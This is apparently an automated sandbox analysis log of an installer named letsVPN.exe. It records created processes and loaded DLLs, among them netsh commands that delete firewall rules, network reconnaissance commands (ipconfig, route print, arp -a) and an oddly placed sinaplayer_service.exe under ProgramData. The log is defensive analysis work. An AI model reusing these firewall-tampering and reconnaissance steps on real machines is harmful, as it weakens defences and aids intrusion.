              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=lets
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=lets.exe
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsPRO.exe
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsPRO
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsVPN
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Program Files (x86)\letsvpn\LetsPRO.exe "C:\Program Files (x86)\letsvpn\LetsPRO.exe" checkNetFramework
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Program Files (x86)\letsvpn\LetsPRO.exe "C:\Program Files (x86)\letsvpn\LetsPRO.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{7c77b43b-9dea-844d-b268-70c5b13694a4}\oemvista.inf" "9" "4d14a44ff" "0000000000000160" "WinSta0\Default" "0000000000000148" "208" "c:\program files (x86)\letsvpn\driver"
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem4.inf" "oem4.inf:3beb73aff103cc24:tap0901.ndi:9.24.6.601:tap0901," "4d14a44ff" "0000000000000160"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=lets
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=lets.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsPRO.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsPRO
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsVPN
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeProcess created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" checkNetFramework
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeProcess created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe"
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C ipconfig /all
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C route print
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C arp -a
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ROUTE.EXE route print
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ARP.EXE arp -a
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: oledlg.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: dataexchange.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: dcomp.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\System32\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\ipconfig.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: acgenral.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: mfc42u.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: mmcbase.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: duser.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: ninput.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: dui70.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: mmcndmgr.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: dataexchange.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: dcomp.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: atlthunk.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeSection loaded: base.dllJump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeSection loaded: wininet.dllJump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeSection loaded: msvcp120.dllJump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeSection loaded: msvcr120.dllJump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeSection loaded: msimg32.dllJump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeSection loaded: winmm.dllJump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeSection loaded: msvcr120.dllJump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeSection loaded: wldp.dllJump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeSection loaded: propsys.dllJump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: acgenral.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: mfc42u.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: mmcbase.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: duser.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: ninput.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: dui70.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: mmcndmgr.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: dataexchange.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: dcomp.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: atlthunk.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: uxtheme.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: userenv.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: apphelp.dll
              Source: C:\ProgramData\letsvpn-latest.exeSection loaded: propsys.dll
